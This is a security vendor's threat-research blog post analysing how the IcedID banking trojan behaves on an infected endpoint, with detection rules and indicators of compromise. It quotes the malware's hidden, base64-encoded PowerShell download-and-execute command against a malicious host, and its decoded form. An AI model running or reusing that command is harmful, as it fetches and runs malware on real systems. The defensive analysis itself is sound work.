Dissecting IcedID behavior on an infected endpoint

IcedID, also known as BokDot, is a banking trojan that was first discovered in 2017. It targets a victim’s financial information and it is also…

OpenText Security Cloud Team profile picture

OpenText Security Cloud Team

March 30, 20234 minutes read

IcedID, also known as BokDot, is a banking trojan that was first discovered in 2017. It targets a victim’s financial information and it is also capable of dropping other malware, most commonly CobaltStrike. 

OpenText™ Cybersecurity Services observed a recent malspam campaign where IcedID was delivered via an archived zip file containing a Visual Basic script.  

The OpenText Services Team, as part of its threat research activities, continuously monitor how malware behaves on the endpoint and creates alerting content for the OpenText Managed Extended Detection and Response (MxDR) Service and its Managed Security Services customers. 

Infection Chain 

Upon execution of a malicious JavaScript associated with the IcedID infection, it calls the command interpreter to execute a base64 encoded Windows PowerShell. The PowerShell then communicates outbound to an IcedID redirect domain, followed by a download of a malicious DLL file. Next, the PowerShell executes the downloaded DLL using the Rundll process. And finally, the DLL is launches a Command and Control (C2) client that generates traffic with IcedID C2 server. 

WScript process interacting with a JavaScript in the users Download folder
Sigma Rule – Command and Scripting Visual Basic

Parent Process: C:\Windows\explorer.exe
Child Process: C:\Windows\System32\wscript.exe
CommandLine: C:\Windows\System32\WScript.exe:C:\Users\Administrator\Downloads\scan_contract.js

WScript process interacting with Cmd Process to execute PowerShell

Parent Process: C:\Windows\System32\wscript.exe
Child Process: C:\Windows\System32\cmd.exe
CommandLine: “C:\Windows\System32\cmd.exe” /c poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA

Command Interpreter interacting with PowerShell to run a Base64 Encoded script

Decoded Base64 Script:
IEX (New-Object Net.Webclient).downloadstring(“http://shisyatnic[.]top/gatef1.php”)

Parent Process: C:\Windows\System32\cmd.exe
Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: poWershell  -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA

Sigma Rule – Encoded PowerShell used to download and execute malicious DLL
PowerShell creating an outbound network connection to download IcedID DLL
IcedID redirect to malicious DLL download location
Download of malicious IcedID download
PowerShell executing downloaded DLL file
PowerShell executing DLL from Local Temp directory
Rundll creating an outbound network connection to IcedID C2
OpenText MDR Agent consistently scans and alerts to a host memory for the
execution on Unsigned or Untrusted DLL’s
Strings analysis of the dumped DLL from memory identifying strings commonly used in IcedID malicious DLL’s (Partial list shown)

Yara Rule for IcedID identification:

rule IcedID_Malware {
       meta:
                author = “OpenText”
               description = “Detects IcedID”
      strings:
           $s1 = “POST” fullword wide
           $s2 = “; _ga=” fullword wide
           $s3 = “; _u=” fullword wide
           $s4 = “; __io=” fullword wide
           $s5 = “; _gid=” fullword wide
           $s6 = “Cookie: _s=” fullword wide
      condition:
              all of ($s*)
}

Indicators of Compromise:
IcedID Redirect Domain: shisyatnic[.]top/gatef1.php
IcedID DLL Hosting Domain: shisyatnic[.]top/dll/loader_p1_dll_64_n1_x64_inf.dll77.dll
IcedID C2: skanfordiporka[.]com
IcedID JavaScript: MD5 Hash – fb1a30af0da989004eaeeac8e72778df
IcedID DLL: MD5 Hash – 658f14c5d83de5e5fee5f5ae00087139

OpenText Cybersecurity Services

Upon detection of a malware, like IceID, OpenText recommends an Incident Response be carried out.  Our Consulting Team uses their extensive experience to threat hunt and remediate any suspected cyber attack.  Customers rely on OpenText for their Digital Forensics and Incident Response as well as our Risk & Compliance Advisory and Managed Security Services.  Learn more about our Services.

Share this post

Share this post to x. Share to linkedin. Mail to
OpenText Security Cloud Team avatar image

OpenText Security Cloud Team

See all posts

More from the author

Technology meets tenacity

Technology meets tenacity

Technology alone won’t defeat cybercriminals. Effective cybersecurity isn’t something you buy off the shelf, set, and forget. To secure your data, you must be proactive,…

November 3, 2022 4 minutes read
OpenText MxDR platform: a team player

OpenText MxDR platform: a team player

There’s a truism in the cybersecurity sector that says enterprise technology stacks are so large because the market demanded big-stack solutions. Convenience, fiscal constraints, and…

November 1, 2022 3 minutes read
Stopping threats cold

Stopping threats cold

Imagine NFL football before Don “Red Dog” Ettinger changed the game by “blitzing” linebackers into the opposing team’s backfield, or hockey before Bobby Orr showed…

October 31, 2022 4 minutes read

Stay in the loop!

Get our most popular content delivered monthly to your inbox.